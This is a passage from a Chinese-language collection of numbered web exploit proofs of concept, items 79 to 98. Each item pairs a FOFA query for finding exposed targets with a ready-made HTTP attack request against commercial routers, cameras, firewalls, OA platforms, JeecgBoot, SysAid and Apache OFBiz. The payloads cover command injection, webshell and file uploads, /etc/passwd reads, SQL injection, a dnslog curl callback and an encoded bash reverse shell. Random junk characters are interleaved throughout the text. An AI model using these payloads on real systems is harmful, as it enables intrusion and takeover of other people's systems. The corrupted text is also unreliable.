/Applications/SkillDevelopAndEHS/% \1 R3 O, J- T1 _
------YsOxWxSvj1KyZow1PTsh98fdu6l--$ c0 B5 E& A' S; {
; p7 ^6 N2 t. C0 ]9 F
3 Z6 ]4 u! y1 U. w* j( O4 r
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1$ r- R6 |: N& h1 T. U' i
Host: x.x.x.x
; G( [. j8 d3 i& F1 x" z7 @% r6 W! U5 @$ {5 p
% I2 Y* X' t9 \) F: q79. BYTEVALUE 百为流控路由器远程命令执行
. d; X& N. R5 XFOFA:BYTEVALUE 智能流控路由器
8 m5 o8 U0 p0 p) X4 k) Y+ {GET /goform/webRead/open/?path=|id HTTP/1.19 B2 t, g! N/ Q/ A7 s
Host:IP# D5 Y. q+ z1 z5 ~8 c9 ^% U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0% E" P0 k5 j) R) h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 B7 L. u0 E, N C T! s* H2 uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# h8 _( T/ ~! Q8 u" x3 Y
Accept-Encoding: gzip, deflate
. p7 v' q) x* A! u. f' uConnection: close
$ [0 l3 A/ @* Q/ i$ l3 PUpgrade-Insecure-Requests: 1
3 m, H* F) }( ?
3 Q {/ ]1 ~# l; H l
1 ?. }0 W) U- \- n3 w# W80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
; J+ }3 i+ C7 zFOFA:app="速达软件-公司产品"
% Q6 ?9 b6 K6 T1 B( uPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
8 x* A+ Z+ }4 QHost: x.x.x.x
' r" {& Y6 d" K3 b* M; DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% G4 w7 V1 H0 F, U6 Y- K/ }1 TContent-Length: 27
# S" f" Z1 }# D- X1 B+ T& y2 dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 c4 W4 I# G. ]* J5 J% y# r0 n, eAccept-Encoding: gzip, deflate
; f0 @, F. z2 [7 }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ e) ?. J9 o% Z6 y# C
Connection: close, j" o; r2 f" }7 t8 L! n; }
Content-Type: application/octet-stream
8 y8 i% p. Y# N5 h: S: Z, y/ ~9 \4 J5 NUpgrade-Insecure-Requests: 1
; y" j" H- d: N5 ^+ z( M" O- h* Y+ e4 `
<% out.print("oessqeonylzaf");%>: ]* x3 N, I$ D8 E) C5 c9 F2 T% a$ b
) r; r1 s6 X3 h* F6 m& i b' ^
! D1 V( ~- v7 N7 z% _# b; y/ E( L- pGET /xykqmfxpoas.jsp HTTP/1.17 D! l$ `6 ~8 {. [" _
Host: x.x.x.x
; Z& X$ j8 e- @8 J1 ]- G1 hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* e% ?; X3 ^, k8 U i5 \Connection: close. e: u5 ?2 @; [5 I4 W* C4 ]
Accept-Encoding: gzip6 w1 | e$ l* H7 h& G& Q% Z
5 Y; o2 b' b+ T0 l; A) E
/ X) H9 i/ d: @: X81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露9 V2 ? {" M( _- O
FOFA:app="uniview-视频监控"
, M" p' m1 k5 ]$ tGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
% K5 B9 a/ j/ DHost: x.x.x.x# w# S8 W: |+ f' C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ x# i+ i3 O/ O8 e
Connection: close
0 w5 t* l$ t8 TAccept-Encoding: gzip0 ?- {# w, W2 V/ T
8 |. P3 H8 z4 G
# Z: A" q( a; w- U- o
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行 w4 d D# W' X& P& u7 b# ]4 t: g* ~
FOFA:app="思福迪-LOGBASE"* j6 h7 Q' e% [( O
POST /bhost/test_qrcode_b HTTP/1.1. c6 } l# |% C
Host: BaseURL
5 V, `! P+ ?& c) x* CUser-Agent: Go-http-client/1.1
* @& i4 D* `1 w) _! M: pContent-Length: 230 h" W: b4 `$ I3 P
Accept-Encoding: gzip9 S: _' }+ B; I0 p
Connection: close( g) Q! K! b, G. s
Content-Type: application/x-www-form-urlencoded
9 `8 A3 j9 e) _' u0 S; t. V! bReferer: BaseURL
& k$ w1 V! f) r6 A4 c% }9 c4 H; b' S/ c: e
z1=1&z2="|id;"&z3=bhost" w& e; E. G; q+ T4 v# Y
; e, g' d) z' O6 D
* L1 s9 R: [1 \
83. JeecgBoot testConnection 远程命令执行
0 K& I3 N; k M, }( F! M0 c# A! H5 qFOFA:title=="JeecgBoot 企业级低代码平台"8 z# B" O$ [, o2 J, ]
9 i" t4 D2 a1 R, F
" u4 g( m# R0 b+ r6 A, o |! k4 A3 i
POST /jmreport/testConnection HTTP/1.19 b( z) O( k# C
Host: x.x.x.x# M" C2 y9 b$ r X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% H9 J& z; j+ z* e2 X
Connection: close- c0 r! R* z# F) j( ]& @) A
Content-Length: 8881
* v- P, L! D9 C! O! |, _Accept-Encoding: gzip
~8 Q) ], Z3 h+ `( }' E# H* QCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"9 |5 F$ n O( {0 a$ F: {6 G3 m
Content-Type: application/json/ W9 `& M4 C' P& C' P# a
: o3 b( L& B- @
PAYLOAD6 H1 `( H+ Q& P" T9 m5 W
2 w7 `( M, V% Z1 k
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入5 f- r; J) b1 r1 n. y. k; V. u
FOFA:title=="JeecgBoot 企业级低代码平台"- b$ |; z5 o' s) d3 b% b3 W. R( B$ W! N
! A, }3 H2 \1 c" f
, h7 r4 W+ k' S" N$ S/ h6 w
( V; K% K# A2 R2 r4 b" h0 L! Q a
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
: C K0 @& ~% ]# d$ J+ SHost: 192.168.40.130:8080: {1 \/ J- h: W) z: O6 i- ^
User-Agent: curl/7.88.1 a4 i- ~& V4 s* B2 f
Content-Length: 156
3 g3 s# Q, I- pAccept: */*
. l8 c- I, z; H9 f& o1 AConnection: close1 U6 a& F* H* j7 p! f: \
Content-Type: application/json
8 u' I) k8 i6 P, W9 n2 ]& N- i! EAccept-Encoding: gzip
# {4 u9 b- r7 p' I( N5 t0 W. b$ w' E( S7 U% d* k& @3 w
{" ?# X. h: u7 Z+ ?
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",1 a" ^) U: z- J2 T0 W
"type": "0"
" [; O8 h! V9 r: ?}% D, G$ b. t; e$ b: y& \
# }- W( X% E# D. K- M
3 k8 y7 V3 I. u0 p% W* E; \7 G
85. SysAid On-premise< 23.3.36远程代码执行
* b/ m0 n: ]# jCVE-2023-47246! s9 v+ x+ I' R6 S5 ?
FOFA:body="sysaid-logo-dark-green.png"
" {& X, V/ Z V0 v6 L& u( u, aEXP数据包如下,注入哥斯拉马( X7 E- J9 Y4 i0 R& S& n
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1& Y( `; @8 T! J1 u. w$ E% ]7 |
Host: x.x.x.x
% C) {2 G9 N. jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) k; x2 b2 `) T. VContent-Type: application/octet-stream3 B: N0 V* x6 c' F9 ~% P! c
Accept-Encoding: gzip
# y- l' T! G" E- }' Q5 [$ \: }2 p/ m
PAYLOAD
# D N, Q, Q( c. ^) S$ {% f: }% T4 P2 b2 x: `( }' `
回显URL:http://x.x.x.x/userfiles/index.jsp; m8 c* f! {/ n0 t6 R: X7 |) Q
( @" t) n0 g( ?8 u- a
86. 日本tosei自助洗衣机RCE7 P8 B* O% P# {7 X7 N6 V7 p2 C
FOFA:body="tosei_login_check.php"3 ` ]9 W) V, a9 r, v( ~. l
POST /cgi-bin/network_test.php HTTP/1.1
9 n- {7 E: F9 j) V+ S! qHost: x.x.x.x- g( w" N5 e* v! T
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
* M2 \" H7 y! n# g% [( BConnection: close
8 e6 M4 n* I H; V9 A' y L3 \Content-Length: 447 r7 a2 Q- ?" H( z" B
Accept: */*/ p, v# m0 }: A0 k
Accept-Encoding: gzip9 P5 x; F% R5 U% [( T6 t) x, p3 Q
Accept-Language: en" u, q# }+ z0 B# c
Content-Type: application/x-www-form-urlencoded, H0 J/ Z3 _+ d# B! o; J
) o- g2 n% b/ Z8 B. |1 xhost=%0acat${IFS}/etc/passwd%0a&command=ping+ [0 @+ u; V3 s p2 }" u
" O5 D+ N! x$ q4 v3 q- D) M& s: g
. h6 t! j+ O1 F0 ~) e* w. b0 l" z
87. 安恒明御安全网关aaa_local_web_preview文件上传
! ^7 {: ~# y6 J4 L+ NFOFA:title="明御安全网关"4 l9 x0 M# S3 k
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
* {( o" ?6 q6 I& V. @3 NHost: X.X.X.X
# v$ ?3 `6 t: i3 ]: F2 rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- U) i! j6 a! r! @# JConnection: close
?; x+ {. ]0 V/ M( t" w' u; CContent-Length: 198/ S) b2 Q" G! ^* ?/ Q$ D
Accept-Encoding: gzip
4 V% w: T3 x3 _& B7 }+ B2 m! }Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd% p( ?$ g4 N5 o( h
) s( v: L& }6 L1 P) _6 c' w
--qqobiandqgawlxodfiisporjwravxtvd7 k8 U+ E! v6 B( N
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"" t6 o x7 a# p) x4 Q
Content-Type: text/plain
3 [- j7 r$ ]8 Z. z1 v2 t% `" P$ {- Z5 n' C
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
! u! G5 a3 ?4 h3 s" d) X/ F% h4 r--qqobiandqgawlxodfiisporjwravxtvd--
( E; L, ?: m( Z: q9 e2 R* I+ Y* _7 V% e! @4 d$ u9 [6 C6 k
3 Q. X3 h" p% k) Y
/jfhatuwe.php, H: h$ l- g- H
2 a" ?/ r3 A- C& S, h7 n# r88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行0 U1 n5 ?) p$ z2 R8 Y# M, u
FOFA:title="明御安全网关"
7 s2 Q7 r/ F3 x3 T' u% `% bGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
3 }$ b8 ^* B0 M& b8 iHost: x.x.x.xx.x.x.x/ q2 _! Y6 I. K+ X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; y+ k" H# A/ D! uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ ~# K9 {( l+ E" o3 \7 r4 rAccept-Encoding: gzip, deflate* b3 C) o0 {5 ^3 x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) W! r7 F* |, p) L
Connection: close
* y" \, c: F2 d; w1 U; i/ M n/ _- s) Z' _% q/ W/ Z7 B _
1 e3 f- p" Y8 c! U" G6 Q4 {* u/astdfkhl.php
) t* F1 F% H7 ?7 O7 Q3 r3 t5 `, V. a3 ^1 Y4 C
89. 致远互联FE协作办公平台editflow_manager存在sql注入
0 x: [. B- \/ AFOFA:title="FE协作办公平台" || body="li_plugins_download"5 ?+ w4 O0 ^6 a( o3 @: w4 A. @
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
2 L: a. c# z G/ U' R3 aHost: x.x.x.x- W5 u8 V; D) ^0 ]+ g9 Q+ t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# @0 A( k& T$ R6 L0 L0 ^Connection: close, J' R1 `2 ]( q; {5 Z
Content-Length: 41! O( i7 r) Y/ E' X+ y, O
Content-Type: application/x-www-form-urlencoded
! G& _' i' g, UAccept-Encoding: gzip% m8 }; s# U& _; ~$ q( Z M
! c- j- e) _9 d) j' a% X2 I; L9 C# Y
option=2&GUID=-1'+union+select+111*222--+
$ ]9 I/ b$ w/ a4 I8 f& ]8 P1 y; o: v, b% A! y& m# K( @- B8 p
4 Y. D$ [5 ^" o% s1 ~6 \
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
+ w5 O& F; d8 JFOFA:icon_hash="-1830859634") q( Z) T9 ]- x$ q8 i% l, |, i
POST /php/ping.php HTTP/1.1; l: W r% D3 a0 d$ n5 r/ T
Host: x.x.x.x
1 X7 ^- g% f3 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0" `2 K; \' ^! b( e3 u
Content-Length: 51
) |! Q) { t2 pAccept: application/json, text/javascript, */*; q=0.019 b8 a6 A p- q' k# V! p
Accept-Encoding: gzip, deflate
+ I% g9 D( ?4 K8 A! lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: \2 q% A: c6 W5 E& H0 @
Connection: close/ H; j( ^3 V/ B0 l c# O
Content-Type: application/x-www-form-urlencoded
1 b5 F* O( U( }8 Q" E, S. tX-Requested-With: XMLHttpRequest4 ^ w, o( L, y) G- o
+ r2 o, F" U( u$ I; F) ?jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
# ~# F7 Y/ @5 a9 ~3 X( J3 [
4 N# T/ d& g! N2 N1 y5 j3 J! B, x! S3 I9 e: L1 S. W2 q
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
3 {( }& {1 d3 m: w/ WFOFA:title="综合安防管理平台"
3 y5 X$ G4 q! f. o# K, o8 o: |6 H+ hGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1+ B1 R+ D' ]( z! M
Host: your-ip& M8 [, r, F& J! s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
- x- i& b- y) y# {2 k. Z$ aAccept-Encoding: gzip, deflate
2 v; e+ r) C' @- E8 ]' iAccept: */*
* Q3 k& G( d6 q, M& l# i3 E3 dConnection: keep-alive
6 r0 W2 M5 w3 b' w. n: y
1 G: D+ m; L3 \# \
& d& `9 n. D4 i6 k0 o9 i
: m, Y/ P! N4 F4 }; k92. 海康威视运行管理中心session命令执行! ?8 \0 U7 i) _1 b, ?9 ~- X9 n
Fastjson命令执行! v7 F+ {" E2 n+ g) c
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76": ?5 t8 x) O, n7 g! U% G" u$ @1 e
POST /center/api/session HTTP/1.1. m+ S/ A5 o. C; I/ \" e
Host:+ g$ J' J! ^- J4 s
Accept: application/json, text/plain, */*- o! Y" W4 x% M$ I4 [0 s
Accept-Encoding: gzip, deflate
* y; Z! o$ W& f% I# JX-Requested-With: XMLHttpRequest3 P4 D9 O1 b6 h# w$ A3 G+ z' E8 v
Content-Type: application/json;charset=UTF-8; X3 A" F1 T4 {
X-Language-Type: zh_CN
) T/ N0 E3 D( F3 m( W2 R8 \' OTestcmd: echo test
% C7 [: P* t3 X, M GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
% Y! W. }) [* K( \& z' h" nAccept-Language: zh-CN,zh;q=0.9% K4 _' x) w' D4 H# S7 G/ _
Content-Length: 57787 N; ? N# E8 E8 O/ I9 d% N
7 k' c& {3 Y2 s/ `" B- l& u
PAYLOAD/ ^' j# m3 E0 K2 `
A; E. D3 j; h$ L, J# c( g/ J5 h6 [) q# |' Y$ `
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传" S* U+ G; x ]4 ~4 _
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="3 ]( K4 Z* B8 A' q- q
POST /?g=app_av_import_save HTTP/1.1
- |4 A% E" q8 Z8 NHost: x.x.x.x
8 p3 t' b5 B) A0 z0 KContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx5 C( [/ @) @$ m; T
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.368 ^* c$ o: o) \8 @8 k
' k& T0 Z. Q6 ]& N! r/ E------WebKitFormBoundarykcbkgdfx
9 ^7 U, u' ?' Q: n! p" o5 yContent-Disposition: form-data; name="MAX_FILE_SIZE"
7 d/ B! S: t: y- O! p8 m: ?, N( W
* r8 c n2 A+ @- V( w0 ?5 I" v10000000
) Z' I2 V( ~& s1 U. ?------WebKitFormBoundarykcbkgdfx4 H' l& ^8 T: j
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
9 K5 m _* D5 W/ p- i6 A! W4 CContent-Type: text/plain8 ?) z1 A3 ~3 C& I4 j0 F3 a
0 F+ U0 {7 @; B: x- c. wwagletqrkwrddkthtulxsqrphulnknxa
" _% {. A" J5 r# N) k ]+ o# K$ h5 x1 i------WebKitFormBoundarykcbkgdfx
- X9 F" Z; c% }/ NContent-Disposition: form-data; name="submit_post"
- @ ]; [2 [$ B: I- }
I5 x) ]; R8 Aobj_app_upfile
7 l$ p8 A: r% z* C3 a3 w3 I6 M------WebKitFormBoundarykcbkgdfx8 y5 y# D) I/ E( i' e. o+ y9 x% J' R
Content-Disposition: form-data; name="__hash__"
/ P! {. ]# F, V/ f
% j8 t( O/ i( R0b9d6b1ab7479ab69d9f71b05e0e9445
/ w' K3 S) a m9 c4 H' g/ }------WebKitFormBoundarykcbkgdfx--$ d5 L; p- |: H! D' ^6 p
8 s1 F( s% x4 `
3 B: t k5 d1 R9 b0 p. V- J( Y" y
GET /attachements/xlskxknxa.txt HTTP/1.10 A: E/ e- |: U! l
Host: xx.xx.xx.xx
- m/ U0 D( _- w+ K& E& i% t3 AUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36# s2 J3 V+ _: w1 r9 s# `
, U3 H. Y5 u! C- Q
/ }$ O/ m4 V) ^! |94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传/ p) q& B$ M7 ~) P& ]& i9 n' @# A
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg==") H: I5 h% M' p
POST /?g=obj_area_import_save HTTP/1.1
0 ?% S- T5 ]3 w: X0 G! x- m5 Z/ fHost: x.x.x.x# E3 O" J, j4 R4 W5 d. J8 [5 m
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt0 A4 C1 _: `- e( a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.369 ?, O7 Z% |! L' m% g
4 c6 N! d$ {" Q------WebKitFormBoundarybqvzqvmt/ z* t: e( W8 n
Content-Disposition: form-data; name="MAX_FILE_SIZE"8 I$ d, m& l2 j6 o( H+ e) S
! _6 i- l% D& e+ U
10000000
4 H6 e) S; M& i/ v4 E* e4 O/ C. _------WebKitFormBoundarybqvzqvmt6 y. `% e. E# b; @
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
5 ?. I& \! z) K" G4 aContent-Type: text/plain
' l P. t1 }; g/ I4 g
- z8 G; K9 W% J# ]# wpxplitttsrjnyoafavcajwkvhxindhmu4 K j L! w+ G- F) f4 b' [
------WebKitFormBoundarybqvzqvmt8 c3 r; a* t: _4 ?2 S, j: c
Content-Disposition: form-data; name="submit_post"2 f$ Z( K/ c1 g: z, F
4 L3 {' q) m _/ g: L0 e
obj_app_upfile
! T5 k) X2 B$ c+ t; U: v------WebKitFormBoundarybqvzqvmt- ^9 {" u& X8 I% o$ |# {" A" @ e
Content-Disposition: form-data; name="__hash__"% r% m% t/ j* |5 Q3 e7 |/ u
3 t6 M9 M( ?' L; N! E
0b9d6b1ab7479ab69d9f71b05e0e9445! e0 R& H( [0 n8 ~ b) i% b
------WebKitFormBoundarybqvzqvmt--! F! @: ?$ V9 R2 N
& \9 W. e( i4 V+ |" j
, \* T3 O- Z' d! H8 s, d" X& n! j F7 K
GET /attachements/xlskxknxa.txt HTTP/1.1
+ A; a/ I( y; BHost: xx.xx.xx.xx
" C3 E m) R1 q; u: jUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36/ R' D# ^9 h) G) F1 \ Y
- h( X$ h& C8 z( [* ` L9 d+ I
% \7 a J# ?" g, W& S. G; E& N/ \2 \7 r* d$ R: Z# m
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行, ^8 _" ~# j) J, t( z, [+ t* |
CVE-2023-49070
/ K% H4 I F4 q8 D6 Y( pFOFA:app="Apache_OFBiz"
; h4 H& O0 W1 O4 k% HPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1# E; N0 z- l2 W7 K7 E+ u
Host: x.x.x.x: U' T/ `8 k/ n' I# u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.367 X0 X% y* q* u; m
Connection: close
8 _# n3 M) f- ] [% \& `Content-Length: 889
0 \9 s$ d% I: P& e- a, m0 SContent-Type: application/xml
! o4 W) C; t; ~8 }2 _Accept-Encoding: gzip
/ F, \6 g1 t+ d* ?8 S u* N
$ l5 K3 U& @# V0 S6 A<?xml version="1.0"?>7 r6 b: h4 A! o2 f& f& v
<methodCall>- P' k# C7 {4 {
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>$ a! K4 v8 P$ h ^0 }
<params>& }7 e; H) a% t$ R" f/ B
<param>
; t) T$ w7 W2 M J <value>
8 ]. o7 o( ~* I; G: B <struct>
/ `% g. I2 d- S, u3 }$ J <member>
" p2 ^4 v0 W, D9 s% J) Y <name>test</name>8 e. S2 z+ A4 T" \9 b
<value>% f+ G- J4 o$ S
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
' r# ^ R# s+ d$ y9 M7 R </value>
; q! D, _: H! l& M </member> z( ^6 N8 M* P0 x7 b
</struct>
* {( s8 A# I. u( a/ i8 s5 K </value>
2 Y" {& P' _- \9 |3 Z) m, t </param>
, P* n( g* L( k! |6 o& e2 W </params>
9 k/ t1 W/ ]9 `9 H9 h- m</methodCall>
1 f7 H7 [! ^5 `8 _ }$ Y; I* V$ ?6 H. _7 z
1 x/ ?0 `5 }. H' P9 W* k' O用ysoserial生成payload
: S0 A4 F' f6 K" M5 Q# y' Hjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
3 J' a) b% ?3 u r% W9 M7 `# h* U! Q( p5 e7 S4 G
2 T5 E( {8 O2 A3 K& P1 v+ f/ |$ V. ?! k将生成的payload替换到上面的POC- ?: o) c+ u' P6 O- b0 N
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1* |( ^. n5 ~: K S) p7 O# I( C; M
Host: 192.168.40.130:8443
& d8 p% ~' O% i# ]5 f: k9 C. CUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
8 e; D* v1 r, l' Z uConnection: close- Q! R2 E% U( j" F9 l; q5 O" T
Content-Length: 889
/ A G# c5 ^4 e8 z8 K- h' [Content-Type: application/xml
U0 ]; b$ X4 |" ?$ I/ R# m2 P% AAccept-Encoding: gzip G! i. q9 c% M( b/ y7 j
9 z1 b, H2 `6 {! u& ^2 ]/ W: _
PAYLOAD, Y2 [+ D- y* m( z
+ H3 f: @' t n
96. Apache OFBiz 18.12.11 groovy 远程代码执行
; `3 i5 z! P8 ]' ~" \/ DFOFA:app="Apache_OFBiz"5 U- W2 M- L6 z
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
: l% |/ l6 [, v7 y; dHost: localhost:8443( Q# b7 U7 W* c0 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0( b, b9 D' y$ u; x; q) J7 K
Accept: */*- i" O, X6 q' u& ^# @4 M8 {& m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 o$ d6 D+ t& x' YContent-Type: application/x-www-form-urlencoded6 M2 \( L( @$ _
Content-Length: 55
4 l" W1 k+ U5 i- h$ j2 b5 f- r# M# p; ^9 W1 Z8 m, O
groovyProgram=throw+new+Exception('id'.execute().text);0 M% D7 |- |0 c- S$ N9 V# C% M
6 y3 [; P( P4 {: E5 N x3 E' ]* I( ?$ u4 t3 F Y; O
反弹shell
% @, N* Y S% S J [7 A在kali上启动一个监听
5 Y$ I4 L. g# wnc -lvp 7777
8 l) P& b; @& ]$ f! V; n) B/ l
+ n* i& C7 o0 jPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.15 a0 V: b; Z# Y8 [$ C5 U8 P+ H
Host: 192.168.40.130:8443
1 O3 d7 F1 ?8 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" t$ q* d$ P9 F' B
Accept: */*$ {; Y, q1 B% J) V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- T+ U1 V5 u! w
Content-Type: application/x-www-form-urlencoded! {: s9 b4 A$ X6 _9 k2 }! L& ^8 T
Content-Length: 71
- `0 x) i& W8 e( I" H4 \( Q- L, n, Q; q" F% k) L/ W% I
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
4 n5 |% L; p7 p$ Q- [5 A2 Q1 i9 H# L, b% U( N! n# \
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行+ P$ w5 x+ k8 J* J9 f
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"6 O7 K* P& s* E. z- q# H
GET /passport/login/ HTTP/1.1" u+ D$ `( ~5 x# P, ~9 ^6 t
Host: 192.168.40.130:8085
7 Y- @% h+ Z5 p$ |. V. UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! H, @* x/ J! }# c8 M- C
Accept-Encoding: gzip
2 d% p& s/ ?2 a% E& oConnection: close: H0 K! b% R' D* v7 ~$ Z" p- m
Cookie: rememberMe=PAYLOAD- @1 M: g4 \, ?( H6 o/ @
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
# Q& g; t. r5 g7 A: f( {( Q
# k4 t# [* u7 g& S9 H- s. _* m3 z
( g L! p0 P1 O. Q: G7 w& ?98. SpiderFlow爬虫平台远程命令执行& X& o+ _; Z% K
CVE-2024-0195
" \. A$ U1 ~* x2 ^9 s/ A$ i: nFOFA:app="SpiderFlow"2 X) x7 s# |. B! Q, p# e5 ~4 s
POST /function/save HTTP/1.1& ]4 ?) i& R9 t) q4 K
Host: 192.168.40.130:8088+ m) ~) x: ^; B# @' C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
5 g- z( z1 ~( D) JConnection: close
9 Q6 Z- m ^& s) d$ G3 `4 s9 E3 eContent-Length: 121, R$ L9 w6 p) w/ n4 I. g/ N
Accept: */*; A u2 ^0 G& P* m% B
Accept-Encoding: gzip, deflate
